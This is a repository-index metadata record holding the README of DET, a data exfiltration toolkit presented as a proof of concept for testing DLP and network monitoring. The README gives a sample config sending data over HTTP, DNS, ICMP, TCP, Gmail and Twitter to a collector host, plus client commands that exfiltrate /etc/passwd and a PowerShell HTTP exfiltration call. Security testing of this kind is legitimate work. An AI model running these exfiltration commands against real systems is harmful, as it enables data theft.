{"id":13936930,"url":"https://github.com/sensepost/DET","last_synced_at":"2025-07-19T22:33:14.878Z","repository":{"id":41089207,"uuid":"52802137","full_name":"sensepost/DET","owner":"sensepost","description":"(extensible) Data Exfiltration Toolkit (DET)","archived":false,"fork":false,"pushed_at":"2017-11-03T12:37:04.000Z","size":35,"stargazers_count":821,"open_issues_count":7,"forks_count":190,"subscribers_count":67,"default_branch":"master","last_synced_at":"2024-11-23T09:02:40.518Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sensepost.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-02-29T15:34:56.000Z","updated_at":"2024-11-21T09:08:55.000Z","dependencies_parsed_at":"2022-07-30T20:18:10.012Z","dependency_job_id":null,"html_url":"https://github.com/sensepost/DET","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sensepost","download_url":"https://codeload.github.com/sensepost/DET/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":226693903,"owners_count":17667757,"icon_url"
:"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-07T23:03:07.580Z","updated_at":"2024-11-27T05:30:41.455Z","avatar_url":"https://github.com/sensepost.png","language":"Python","readme":"DET (extensible) Data Exfiltration Toolkit\n=======\n\nDET (provided AS IS) is a proof of concept to perform Data Exfiltration using either a single channel or multiple channels at the same time.  \n\n**This is a Proof of Concept aimed at identifying possible DLP failures. This should never be used to exfiltrate sensitive/live data (say on an assessment)**\n\nThe idea was to create a generic toolkit into which any kind of protocol/service can be plugged, to test the configuration of implemented Network Monitoring and Data Leakage Prevention (DLP) solutions against different data exfiltration techniques.\n\nThe primary repository has now moved [here](https://github.com/PaulSec/DET).\n\n# Slides\n\nDET was presented at [BSides Ljubljana](https://bsidesljubljana.si/) on the 9th of March 2016.\nSlides are available [here](https://docs.google.com/presentation/d/11uk6d-xougn3jU1wu4XRM3ZGzitobScSSMUlx0MRTzg).\n\n# Example usage (ICMP plugin)\n\n## Server-side: \n\n[![asciicast](https://asciinema.org/a/18rjfp59rc7w27q7vlzlr96qv.png)](https://asciinema.org/a/18rjfp59rc7w27q7vlzlr96qv)\n\n## Client-side: \n\n[![asciicast](https://asciinema.org/a/9m7ovlh7e4oyztx8e3fxyqsbl.png)](https://asciinema.org/a/9m7ovlh7e4oyztx8e3fxyqsbl)\n\n\n# Usage while combining two channels (Gmail/Twitter)\n\n## Server-side: 
\n\n[![asciicast](https://asciinema.org/a/9lfpo9m47y5sglvdd1kyb1lwj.png)](https://asciinema.org/a/9lfpo9m47y5sglvdd1kyb1lwj)\n\n## Client-side: \n\n[![asciicast](https://asciinema.org/a/bfstssgptxd41ncces4981cn6.png)](https://asciinema.org/a/bfstssgptxd41ncces4981cn6)\n\n\n# Installation\n\nClone the repo: \n\n```bash\ngit clone https://github.com/sensepost/DET.git\n```\n\nThen: \n\n```bash\npip install -r requirements.txt --user\n```\n\n# Configuration\n\nTo use DET, you will need to configure it with your own settings (e.g. SMTP/IMAP, AES256 encryption\npassphrase and so on). A sample configuration file is provided, called `config-sample.json`:\n\n```json\n{\n    \"plugins\": {\n        \"http\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 8080\n        },\n        \"google_docs\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 8080\n        },\n        \"dns\": {\n            \"key\": \"google.com\",\n            \"target\": \"192.168.1.101\",\n            \"port\": 53\n        },\n        \"gmail\": {\n            \"username\": \"dataexfil@gmail.com\",\n            \"password\": \"ReallyStrongPassword\",\n            \"server\": \"smtp.gmail.com\",\n            \"port\": 587\n        },\n        \"tcp\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 6969\n        },\n        \"udp\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 6969\n        },\n        \"twitter\": {\n            \"username\": \"PaulWebSec\",\n            \"CONSUMER_TOKEN\": \"XXXXXXXXX\",\n            \"CONSUMER_SECRET\": \"XXXXXXXXX\",\n            \"ACCESS_TOKEN\": \"XXXXXXXXX\",\n            \"ACCESS_TOKEN_SECRET\": \"XXXXXXXXX\"\n        },\n        \"icmp\": {\n            \"target\": \"192.168.1.101\"\n        }\n    },\n    \"AES_KEY\": \"THISISACRAZYKEY\",\n    \"sleep_time\": 10\n}\n```\n\n# Usage\n\n## Help usage\n\n```bash\npython det.py -h\nusage: det.py 
[-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]\n              [-L]\n\nData Exfiltration Toolkit (SensePost)\n\noptional arguments:\n  -h, --help  show this help message and exit\n  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')\n  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')\n  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')\n  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')\n  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')\n  -L          Server mode\n```\n\n## Server-side: \n\nTo load every plugin:\n\n```bash\npython det.py -L -c ./config.json\n```\n\nTo load *only* twitter and gmail modules: \n\n```bash\npython det.py -L -c ./config.json -p twitter,gmail\n```\n\nTo load every plugin and exclude DNS: \n\n```bash\npython det.py -L -c ./config.json -e dns\n```\n\n## Client-side:\n\nTo load every plugin: \n\n```bash\npython det.py -c ./config.json -f /etc/passwd\n```\n\nTo load *only* twitter and gmail modules: \n\n```bash\npython det.py -c ./config.json -p twitter,gmail -f /etc/passwd\n```\n\nTo load every plugin and exclude DNS: \n\n```bash\npython det.py -c ./config.json -e dns -f /etc/passwd\n```\nAnd in PowerShell (HTTP module): \n\n```powershell\nPS C:\\Users\\user01\\Desktop\u003e\nPS C:\\Users\\user01\\Desktop\u003e . .\\http_exfil.ps1\nPS C:\\Users\\user01\\Desktop\u003e HTTP-exfil 'C:\\path\\to\\file.exe'\n```\n\n# Modules\n\nSo far, DET supports multiple protocols, listed here: \n\n- [X] HTTP(S)\n- [X] ICMP\n- [X] DNS\n- [X] SMTP/IMAP (eg. Gmail)\n- [X] Raw TCP\n- [X] PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))\n\nAnd other \"services\": \n\n- [X] Google Docs (Unauthenticated)\n- [X] Twitter (Direct Messages)\n\n# Experimental modules\n\nSo far, I am busy implementing new modules which are almost ready to ship, including: \n\n- [ ] Skype (95% done)\n- [ ] Tor (80% done)\n- [ ] Github (30/40% done)\n\n# Roadmap\n\n- [X] Add proper encryption (eg. 
AES-256) Thanks to [ryanohoro](https://github.com/ryanohoro)\n- [X] Compression (extremely important!) Thanks to [chokepoint](https://github.com/chokepoint)\n- [ ] Proper data obfuscation and integrating [Cloakify Toolset](https://github.com/trycatchhcf/cloakify)\n- [ ] FTP, Flickr [LSB Steganography](https://github.com/RobinDavid/LSB-Steganography) and YouTube modules\n\n# References\n\nSome pretty cool references/credits to people whose projects inspired me: \n\n- [Powershellery](https://github.com/nullbind/Powershellery/) from Nullbind.\n- [PyExfil](https://github.com/ytisf/PyExfil), truly awesome. \n- [dnsteal](https://github.com/m57/dnsteal) from m57.\n- [NaishoDeNusumu](https://github.com/3nc0d3r/NaishoDeNusumu) from 3nc0d3r.\n- [Exphil](https://github.com/glennzw/exphil) from Glenn Wilkinson.\n- WebExfile from Saif El-Sherei\n\n# Contact/Contributing\n\nYou can reach me on Twitter [@PaulWebSec](https://twitter.com/PaulWebSec). \nFeel free to contribute: clone, fork, submit your PR and so on.\n\n# License\n\nDET is licensed under an [MIT License](https://opensource.org/licenses/MIT). \nPermissions beyond the scope of this license may be available at [info@sensepost.com](info@sensepost.com)\n","funding_links":[],"categories":["Tools","Exfiltration Tools","Python","Network Tools","Exfiltration","Awesome Penetration Testing (\"https://github.com/Muhammd/Awesome-Pentest\")"],"sub_categories":["Network Tools","Zealandia","Forensics","Exfiltration Tools","Purple Team","Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsensepost%2FDET","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsensepost%2FDET","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsensepost%2FDET/lists"}